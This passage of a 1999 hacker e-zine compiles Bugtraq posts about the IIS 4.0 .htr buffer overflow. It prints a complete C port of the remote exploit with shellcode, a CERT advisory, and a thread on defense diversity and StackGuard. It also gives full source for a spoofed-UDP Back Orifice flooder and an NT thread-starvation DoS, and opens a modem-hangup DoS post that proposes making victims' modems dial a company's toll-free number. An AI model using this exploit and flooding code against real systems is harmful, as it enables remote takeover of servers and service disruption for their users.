We have tested it on the English version of NT4.0, with IIS4.0, Service Pack
4 and 5.
We have had some people eMail us that they have this configuration and it is
not working... This very well could be possible that the offset we are using
is not working for some dll's and such... people might have a different
version and what not. For this case we *might* release a second exploit that
uses a better offset that should work on all nt4.0 iis4.0 sp4 and sp5
machines but honestly it is not that big of a deal to us. The hole is there,
and is exploitable and other people have been writing exploits for it also.
We do know that our exploit probably does not work on sp3 because of the
offset we use... we have gotten a few eMails about this and we never did
test nor claim it worked on sp3 but we *might* in our second version of the
exploit find an offset that works for sp3 also.
I honestly think this post is in some ways pointless but maybe it will help
to cut back some of the eMails we are getting about the above information.
Thank you to everyone who has been helping out.
Signed,
Marc
eEye Digital Security Team
http://www.eEye.com
P.S.
Jump on over to technotronic.com for some good information and other
exploits and such.
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 19:04:20 +0200 (CEST)
From: typo
To: bugtraq@netspace.org
Cc: packetstorm@genocide2600.com
Subject: iis4 remote exploit ported
the teso crew has ported the iis exploit to linux...
basically this program does the same as the windows version (written in
asm) of this exploit. Produced shellcode is identical.. everything should
work.. we haven't tested. Everyone except rootshell.com is allowed to put
a copy of this on his/her/their webpage.
visit #austria on ircnet for newest elite 0day exploits.
scut & typo
/* iis 4.0 exploit
* by eeye security
*
* ported to unix/C by the teso crew.
*
* shoutouts to #hax and everyone else knowing us...
* you know who you are.
*
* gcc -o tesoiis tesoiis.c -Wall
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
char stuff[] = "\x42\x68\x66\x75\x41\x50"; /* "!GET /" */
#define URL_OFFSET 1055
char front[] = "GET /AAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"\x41\x41\x41\x41\x41\x41\xb0\x87\x67\x68\xb0\x87"
"\x67\x68\x90\x90\x90\x90\x58\x58\x90\x33\xc0\x50"
"\x5b\x53\x59\x8b\xde\x66\xb8\x21\x02\x03\xd8\x32"
"\xc0\xd7\x2c\x21\x88\x03\x4b\x3c\xde\x75\xf4\x43"
"\x43\xba\xd0\x10\x67\x68\x52\x51\x53\xff\x12\x8b"
"\xf0\x8b\xf9\xfc\x59\xb1\x06\x90\x5a\x43\x32\xc0"
"\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43\x52\x51"
"\x53\x56\xb2\x54\xff\x12\xab\x59\x5a\xe2\xe6\x43"
"\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75\xf4\x43"
"\x52\x53\xff\x12\x8b\xf0\x5a\x33\xc9\x50\x58\xb1"
"\x05\x43\x32\xc0\xd7\x50\x58\x84\xc0\x50\x58\x75"
"\xf4\x43\x52\x51\x53\x56\xb2\x54\xff\x12\xab\x59"
"\x5a\xe2\xe6\x33\xc0\x50\x40\x50\x40\x50\xff\x57"
"\xf4\x89\x47\xcc\x33\xc0\x50\x50\xb0\x02\x66\xab"
"\x58\xb4\x50\x66\xab\x58\xab\xab\xab\xb1\x21\x90"
"\x66\x83\xc3\x16\x8b\xf3\x43\x32\xc0\xd7\x3a\xc8"
"\x75\xf8\x32\xc0\x88\x03\x56\xff\x57\xec\x90\x66"
"\x83\xef\x10\x92\x8b\x52\x0c\x8b\x12\x8b\x12\x92"
"\x8b\xd7\x89\x42\x04\x52\x6a\x10\x52\xff\x77\xcc"
"\xff\x57\xf8\x5a\x66\x83\xee\x08\x56\x43\x8b\xf3"
"\xfc\xac\x84\xc0\x75\xfb\x41\x4e\xc7\x06\x8d\x8a"
"\x8d\x8a\x81\x36\x80\x80\x80\x80\x33\xc0\x50\x50"
"\x6a\x48\x53\xff\x77\xcc\xff\x57\xf0\x58\x5b\x8b"
"\xd0\x66\xb8\xff\x0f\x50\x52\x50\x52\xff\x57\xe8"
"\x8b\xf0\x58\x90\x90\x90\x90\x50\x53\xff\x57\xd4"
"\x8b\xe8\x33\xc0\x5a\x52\x50\x52\x56\xff\x77\xcc"
"\xff\x57\xec\x80\xfc\xff\x74\x0f\x50\x56\x55\xff"
"\x57\xd8\x80\xfc\xff\x74\x04\x85\xc0\x75\xdf\x55"
"\xff\x57\xdc\x33\xc0\x40\x50\x53\xff\x57\xe4\x90"
"\x90\x90\x90\xff\x6c\x66\x73\x6f\x66\x6d\x54\x53"
"\x21\x80\x8d\x84\x93\x86\x82\x95\x21\x80\x8d\x98"
"\x93\x8a\x95\x86\x21\x80\x8d\x84\x8d\x90\x94\x86"
"\x21\x80\x8d\x90\x91\x86\x8f\x21\x78\x8a\x8f\x66"
"\x99\x86\x84\x21\x68\x8d\x90\x83\x82\x8d\x62\x8d"
"\x8d\x90\x84\x21\x78\x74\x70\x64\x6c\x54\x53\x21"
"\x93\x86\x84\x97\x21\x94\x86\x8f\x85\x21\x94\x90"
"\x84\x8c\x86\x95\x21\x84\x90\x8f\x8f\x86\x84\x95"
"\x21\x88\x86\x95\x89\x90\x94\x95\x83\x9a\x8f\x82"
"\x8e\x86\x21\x90\x98\x8f\x4f\x86\x99\x86\x21"
/* stick it in here */
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21\x21"
"\x21\x21\x21"
".htr HTTP/1.0";
void
usage (void)
{
printf ("usage: ./tesoiis host port url\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
/* yadda,yadda.. you can try exploiting our exploit!!
* update: hmm.. is this exploitable? gets EIP touched by exit()?
* gotta check this later...
*/
char host[256], url[256];
int port,sd,t = 0;
int m = 0;
char *cc, *pfft;
struct sockaddr_in cs;
printf ("teso crew IIS exploit.. shellcode by eEye.\n");
printf ("------------------------------------------\n");
if (argc < 4)
usage();
strcpy (host, argv[1]);
strcpy (url, argv[3]);
port = atoi (argv[2]);
if ((port < 1) || (port > 65535))
usage();
cc = url;
pfft = front + URL_OFFSET;
while (*cc) {
if (*cc == '/' && 0 == t) {
memcpy (pfft, stuff, 6);
pfft += 6;
t = 1;
} else {
*pfft = *cc + 0x21;
pfft++;
}
cc++;
m += 1;
}
printf ("Host: %s Port: %d Url: %s\n", host, port, url);
printf ("Connecting... ");
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
printf ("done.. sending shellcode..");
fflush (stdout);
net_write (sd, "%s\n\n", front);
printf ("done.. closing fd!\n");
close (sd);
printf ("%s\n", front);
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 19:09:42 GMT
From: Ethan Benatan
To: BUGTRAQ@netspace.org
Subject: Re: IIS Remote Exploit (injection code)
>>> "Greg" == Greg Hoglund writes:
Greg> I read yesterday on eEye.com that they had discovered a buffer
Greg> overflow in IIS.....
Greg> Lastly, I would simply like to point out that monoculture
Greg> installations are very dangerous. It's a concept from
Greg> agribusiness.. if you have all one crop, and a virus comes
Greg> along that can kill that crop, you're out of business.
Very true, and this is a terrifically important message to get out.
Not to be pedantic but actually it is a concept from ecology: the
"business", as Greg puts it, can be any system. Diversity makes for
resilience, and vice versa. Okay aleph, it's not a bug but it is a
way we should be thinking.
Greg> With
Greg> almost ALL of the IIS servers on the net being vulnerable to
Greg> this exploit, we also have a monoculture. And, it's not just
Greg> IIS. The backbone of the Internet is built on common router
Greg> technology (such as cisco IOS). If a serious exploit comes
Greg> along for the IOS kernel, can you imagine the darkness that
Greg> will fall?
Ethan
ethan+@pitt.edu
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 16:40:25 -0400
From: Dug Song
To: BUGTRAQ@netspace.org
Subject: Re: IIS Remote Exploit (injection code)
On Wed, 16 Jun 1999, Ethan Benatan wrote:
> Very true, and this is a terrifically important message to get out...
> Diversity makes for resilience, and vice versa.
see stephanie forrest's work on computer immunology:
http://www.cs.unm.edu/~immsec/
and to a lesser extent, random "canary" values in StackGuard:
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
and the introduction of randomness to defeat race attacks, predictable
sequence number attacks, etc. in OpenBSD:
http://www.openbsd.org/crypto.html
-d.
---
http://www.monkey.org/~dugsong/
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 15:03:52 -0700
From: Crispin Cowan
To: BUGTRAQ@netspace.org
Subject: Diversity (was: IIS Remote Exploit (injection code))
Dug Song wrote:
> On Wed, 16 Jun 1999, Ethan Benatan wrote:
>
> > Very true, and this is a terrifically important message to get out...
> > Diversity makes for resilience, and vice versa.
>
> see stephanie forrest's work on computer immunology:
>
> http://www.cs.unm.edu/~immsec/
>
> and to a lesser extent, random "canary" values in StackGuard:
>
> http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
StackGuard came about because we investigated the approach of using
diversity to resist attack, and found it to be VERY limited in
effectiveness. The core problem is that when you change things, you
create incompatibilities for friend and foe alike, i.e. a diversity hack
strong enough to defeat an attacker is also likely to break a lot of
YOUR applications. This occurs because:
* The diversity hack must preserve many invariants that are necessary
to keep legitimate applications running, and these invariants are
often subtle and unknown, e.g. Linux applications that only work on
Red Hat systems.
* Simultaneously, the diversity hack must BREAK the invariants that the
attacker depends on, and these invariants are mostly unknown. If you
knew what they were, you would have fixed the bug :-)
Having discovered that diversity is hard to make both effective and
practical, we moved on to study what we call "restrictions." A
restriction prohibits certain classes of behavior that are always known to
be bad, e.g. changing the return address of an active function, which is
what stack smashes try to do, and what StackGuard prevents.
It is our conjecture that for every diversity hack that one can propose,
there is a restriction hack that is easier to deploy and more effective.
This has been true in practice as we try to construct security-enhancing
tools.
Full papers on these ideas can be found here:
http://www.cse.ogi.edu/DISC/projects/immunix/survivability.html
Crispin
-----
Crispin Cowan, Research Assistant Professor of Computer Science, OGI
NEW: Protect Your Linux Host with StackGuard'd Programs :FREE
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
Microsoft: Putting the "lame" in "layman"
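The restriction Crispin describes, modelled as an added example (not StackGuard's or Immunix's code): a frame is simulated as a struct holding a local buffer, a canary word and a saved return address, so the overflow is an ordinary, well-defined byte write rather than real stack corruption. The fixed canary value, the stand-in return address and the 'A' filler are constructed for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Modelled frame, laid out the way the stack grows toward the saved return
 * address: local buffer first, then the canary, then the return address. */
struct frame {
    char     buf[16];
    uint32_t canary;
    uint32_t saved_ret;
};

#define CANARY_VALUE 0xDEADBEEFu  /* fixed here; StackGuard randomizes it per run */
#define ORIGINAL_RET 0x00401000u  /* constructed stand-in for a legitimate return address */

/* Prologue: plant the canary beside the saved return address. */
void frame_enter(struct frame *f)
{
    memset(f->buf, 0, sizeof f->buf);
    f->canary = CANARY_VALUE;
    f->saved_ret = ORIGINAL_RET;
}

/* The bug class behind the .htr overflow: an unbounded copy into buf. The
 * frame is written byte by byte through a pointer to the whole struct, so the
 * model stays well-defined C while still overrunning buf into canary and ret. */
void unsafe_copy(struct frame *f, const unsigned char *src, size_t n)
{
    unsigned char *raw = (unsigned char *)f + offsetof(struct frame, buf);
    if (n > sizeof *f) n = sizeof *f;   /* cap at the frame; a real stack has no such cap */
    for (size_t i = 0; i < n; i++) raw[i] = src[i];
}

/* Epilogue restriction: refuse to return through a frame whose canary changed. */
int frame_intact(const struct frame *f)
{
    return f->canary == CANARY_VALUE;
}

/* Copy n bytes of 'A' filler into a fresh frame. Returns 1 if the canary
 * tripped (the overwrite would be caught before the return), else 0. */
int canary_tripped(size_t n)
{
    struct frame f;
    unsigned char input[sizeof f];
    memset(input, 'A', sizeof input);
    frame_enter(&f);
    unsafe_copy(&f, input, n);
    return frame_intact(&f) ? 0 : 1;
}

/* Same experiment, returning the saved return address afterwards: without the
 * restriction this is the value the CPU would jump to. */
uint32_t ret_after_copy(size_t n)
{
    struct frame f;
    unsigned char input[sizeof f];
    memset(input, 'A', sizeof input);
    frame_enter(&f);
    unsafe_copy(&f, input, n);
    return f.saved_ret;
}

int main(void)
{
    for (size_t n = 8; n <= sizeof(struct frame); n += 8)
        printf("%2zu bytes: canary %s, saved ret 0x%08x\n", n,
               canary_tripped(n) ? "TRIPPED" : "intact", ret_after_copy(n));
    return 0;
}
```

A copy that stays within the 16-byte buffer leaves the canary alone; any copy long enough to reach the return address has to pass through the canary first, which is the invariant the check relies on.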
--------------------------------------------------------------------------------
Date: Wed, 16 Jun 1999 16:30:12 -0400
From: CERT Advisory
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.07 - IIS Buffer Overflow
CERT Advisory CA-99-07 IIS Buffer Overflow
Originally released: June 16, 1999
Source: CERT/CC
Systems Affected
* Machines running Microsoft Internet Information Server 4.0.
I. Description
A buffer overflow vulnerability affecting Microsoft Internet
Information Server 4.0 has been discovered in the ISM.DLL library.
According to Microsoft, ISM.DLL is the "filter DLL that processes .HTR
files. HTR files enable remote administration of user passwords."
A tool to exploit this vulnerability has been publicly released.
II. Impact
This vulnerability allows remote intruders to execute arbitrary code
with the privileges of the IIS server. Additionally, intruders can use
this vulnerability to crash vulnerable IIS processes.
III. Solution
Microsoft has released Microsoft Security Bulletin MS99-019 describing
a workaround to this problem. Additionally, Microsoft is working on a
patch to fix this problem; information regarding this patch will be
available in the Microsoft Security Bulletin. We encourage you to read
this bulletin, available from
http://www.microsoft.com/security/bulletins/ms99-019.asp
We will update this advisory as more information becomes available.
Please check the CERT/CC web site for the most current revision.
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html.
______________________________________________________________________
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
If you prefer to use DES, please call the CERT hotline for more
information.
Getting security information
CERT publications and other security information are available from
our web site http://www.cert.org/.
To be added to our mailing list for advisories and bulletins, send
email to cert-advisory-request@cert.org and include SUBSCRIBE
your-email-address in the subject of your message.
Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be
found in http://www.cert.org/legal_stuff.html.
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
Revision History
June 16, 1999: Initial release
--------------------------------------------------------------------------------
Date: Mon, 21 Jun 1999 12:23:27 +0300
From: Mikko Hypponen
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Alert: Microsoft Security Bulletin (MS99-019) - IIS Fix Available
Russ:
>Microsoft have released a patch for IIS 4.0 which addresses the issues
>uncovered by eEye.
Also, if you want to monitor who's running IISHACK in your organisation,
we've added detection of this tool (as a trojan horse) into latest updates
for F-Secure Anti-Virus. This detects the original IISHACK.EXE as released
by eEye with the name "Trojan.IIS_Hack".
For more information, see our Virus News Updates at:
http://www.datafellows.com/news/vir-news/
--
Mikko Hermanni Hyppönen, Mikko.Hypponen@DataFellows.com
Manager, Anti-Virus Research, Data Fellows Corp.
Integrated Solutions for Enterprise Security
Tel +358 9 8599 0513 - fax +358 9 8599 0713
http://www.DataFellows.com/staff/hermanni/
@HWA
112.0 BO server flooder sends random spoofed udp's to the attacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/**************************************/
/* Back Orifice server flooder        */
/* Sends random spoofed UDP BO packets */
/* to some lame logger.               */
/* This code crashes the old fakebo   */
/* and the real one with just 5       */
/* packets; the latest one just needs */
/* more packets to crash ;)           */
/* Another code from Bong             */
/* bong26@hotmail.com                 */
/**************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))
#define err(x) { fprintf(stderr, x); exit(1); }
int i;
char data[] = {
0xCE, 0x63, 0xD1, 0xD2, 0x16,
0xE7, 0x13, 0xCF, 0x3D, 0xA5,
0xA5, 0x86, 0xB2, 0x75, 0x4B,
0x99, 0x9F, 0x18, 0x58, 0x86,
0x89, 0x99};
void brek(int no){
printf("\nStoped\n%d packet sended!\n",i);
exit(1);
}
int sendpkt_udp (sin, sock, data, len, src, dst, sport, dport)
struct sockaddr_in *sin;
unsigned short int sock, len, sport, dport;
unsigned long int src, dst;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 + len);
ip.id = htons (31337 + (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = src;
ip.daddr = dst;
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + len);
udp.check = (short) 0;
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, len);
memcpy (packet + sizeof (ip) + sizeof (udp) + len, crashme, 500);
return sendto (sock, packet, sizeof (ip) + sizeof (udp) + len + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in));
}
unsigned int lookup (char *host)
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1){
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));}
return (addr);
}
void main (int argc, char **argv)
{
unsigned int src,dst;
char *tmpsrc;
struct sockaddr_in sin;
struct hostent *hep;
long wait=25000;
int sock,dstP,srcP=113,nb=1,mod,a,b,c,d;
signal(SIGINT, brek);
if (argc < 3){
printf("\nBo logger flooder by Bong\n");
printf ("Usage: %s [source] [numb]\n",argv[0]);
printf("Mode 1: one source\n");
printf("Mode 2: random source\n\n");
exit(1);}
if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err("Unable to open raw socket.\n");
mod=atoi(argv[1]);
if (mod==1){
if (argc < 4) err("Need at least 3 arguments.\n"); /* bail out instead of dereferencing a missing argv[3] */
if (!(src = lookup (argv[2])))
err ("Unable to lookup address.\n");
if (!(dst = lookup (argv[3])))
err ("Unable to lookup address.\n");
tmpsrc=(argv[3]);
if(argv[4]){ nb = atoi(argv[4]);}
}else{
if (!(dst = lookup (argv[2])))
err("Unable to lookup address..\n");
tmpsrc=(argv[2]);
if(argv[3]){ nb = atoi(argv[3]);}
}
sin.sin_family = AF_INET;
sin.sin_port = 31337;
sin.sin_addr.s_addr = dst;
printf("Flood %s with mode %d and %d packet\n",tmpsrc,mod,nb);
for(i=0; i < nb; i++){
if (mod==2){
srandom((time(0)+i));
srcP = getrandom(1,1500)+1000;
a = getrandom(0, 255);
b = getrandom(0, 255);
c = getrandom(0, 255);
d = getrandom(0, 255);
sprintf(tmpsrc, "%i.%i.%i.%i", a, b, c, d);
hep=gethostbyname(tmpsrc);
src= *(unsigned long *)hep->h_addr;}
if ((sendpkt_udp (&sin, sock, &data,sizeof(data),src,dst,srcP,31337)) == -1)
err ("Error sending the UDP packet.\n");}
printf("\n%d Packet sended!\n",i);
}
@HWA
113.0 frootcake.c revisited
~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 9 Jun 1999 23:46:05 +1000
From: kiva
To: BUGTRAQ@netspace.org
Subject: ordinary users bringing NT to its knees [repost]
[Aleph, sorry about my original post - I pasted the wrong code! oops! :) ]
Hi,
sorry if problems like this are known, but I thought I'd post this just
in case...
I was curious at how well NT could handle *lots* of threads, so I wrote the
following. It basically locks up the system with an inability to kill the
process because (I) never get the task manager up. Pretty bad since an
ordinary user can run it :/
my system: 2xPPro with NT4 (SP5), 128megs RAM.
cheers
----------------------------
/*
* frootcake.c
* kiva@wookey.org
*
* this tests NT at coping with *really dodgy* code...
* it totally brings my SMP box to being unusable (SP5)
*/
#include <windows.h> /* header names restored; the angle-bracketed names were lost in extraction */
#include <stdio.h>
void poobah();
DWORD WINAPI thread_func (LPVOID lpv)
{
DWORD id;
HANDLE h;
BOOL success = 1;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
while (success){
switch (GetThreadPriority (h)){
case THREAD_PRIORITY_ABOVE_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_BELOW_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_HIGHEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_IDLE:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_LOWEST:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
case THREAD_PRIORITY_NORMAL:
success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
break;
}
}
poobah();
return 0;
}
void poobah()
{
DWORD id;
HANDLE h;
h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
poobah();
}
int main ()
{
printf ("frootcake - kiva@wookey.org\n");
poobah();
return 0;
}
/* eof */
--------------------------------------------------------------------------------
Date: Thu, 10 Jun 1999 12:34:23 -0700
From: David Schwartz
To: BUGTRAQ@netspace.org
Subject: Re: ordinary users bringing NT to its knees [repost]
This is just an exploit for the 'neverending quantum' bug that's been known
for ages. See http://www.sysinternals.com/tips.htm#NEQuantum It has nothing
to do with the number of threads running (except that you need at least one
per CPU).
The bug occurs when a thread changes its priority. NT changes the thread's
priority, but also gives it a new execution quantum. By repeating this
process, a single thread can monopolize a CPU.
DS
--------------------------------------------------------------------------------
Never-ending Quantum?
In NT, as with most time-sharing operating systems, threads run in turns called
quantums. Normally, a thread executes until its quantum runs out. The next time
it is scheduled it starts with a full quantum. However, in NT a thread also gets
its quantum refreshed every time its thread or process priority is set. This
means that a thread can reset its quantum by calling SetThreadPriority (without
changing its priority) before its turn runs out. If it continues to do this it
will effectively have an infinite quantum. Why does NT do this? It's not clear,
but it appears to be a bug.
@HWA
114.0 gin.c spoofs packets containing + + + ATH0 which causes some modems to hang up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ www.rootshell.com ]
From jpester@engr.csulb.edu Sun Jun 6 22:09:57 1999
Date: Sun, 6 Jun 1999 22:05:49 -0700 (PDT)
From: Jonathan Pester
To: submission@rootshell.com
Subject: 'new' DoS
Hey kids, amputee here...
Pointed out to me recently was a 'new' DoS if you can call it that..I'm
sure lots of people have thought of doing this, but I haven't seen or
heard of anything like it yet. So here goes, as usual a code to test the
exploit is attached below, now for a long boring technical explanation
(script kiddiez, skip to the code now)
[ explanation ]
The way the exploit works is it hides escape/control sequences in a ICMP
echo_request packet (it contains the string +++ATH0) the +++ sends the
modem into escape mode (and if the guard time on the modem is set
ridiculously low) it will go into command mode and you can issue it an
ATH0 to hang up. It works on the reply, because it receives the
echo_request packet, then duplicates the packet with a new timestamp and
checksum, dest/source hosts and returns it to the sender, when it returns
it the string is sent to the modem, and thus hanging it up. There are a
few conditions that must be met for it to work (if you don't want to be
vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to
reply to one if it gets one
2) target computer must be using a modem (you can't hangup DS3s, although
i suppose you could hangup telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set
ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess
you can use your own address, but then the target knows where it came
from)
In my experimenting, I have also devised various fun ways to use this
program other than just nuking your buddy off IRC. In theory..it is
possible to modify the program to do fun stuff like make the target call
some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the
modem hangup, pause for 6 seconds then call 5551212..this is fun for
obvious reasons. Then the next variation I came up with is a smurf like
implementation in which you could make a script to DoS a class C subnet,
with the number of your least favorite company, since most companies have
800 numbers, not only does this cause chaos to the phone bank, but also
costs ~$.30 per call...but i don't condone any of those ideas of course,
this is just for experimental/educational purposes only, if you fix your
modems, none of this is possible, so get off your ass and fix it.
script kiddiez: here is your code...
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
/*
* gin.c [ fuck the soda nukers, im no kiddie ]
*
* [ http://www.rootshell.com/ ]
*
* [ sarcastic program description here ]
* pff, hey kiddiez! this program sends mad packets to some foo from
* every broadcast address on earth, mad leet yo...
* (you really wanna know what it does? LEARN TO CODE! and stop being a
* gayass fuckin script kiddie)
*
* Author: amputee (amputee@fack.net)
* Compiled on:
* Linux 2.2.9 i586 (GNU/Debian 2.2 development version)
* egcs-2.91.66
*
* [ time for greets, and fuck yous ]
*
* [ Greets (in no logical order) ]
* scummy, fobia (come back foo), ignitor, stalin, bigs, rotafer, statix
* silencers, blackang|, porp, the rest of #shutdown, soldier, klepto,
* drastic, the other #havok OGs and #eof, governor, cry0mance, gixerboy,
* protocol-, broknbonz, abalution, and anyone else i forgot that isn't
* in my fuck you list...
*
* [ Fuck yous ]
* spawn66x1 <--hahah, nucleoid (aka dynamo, emulate, microbe, immune,
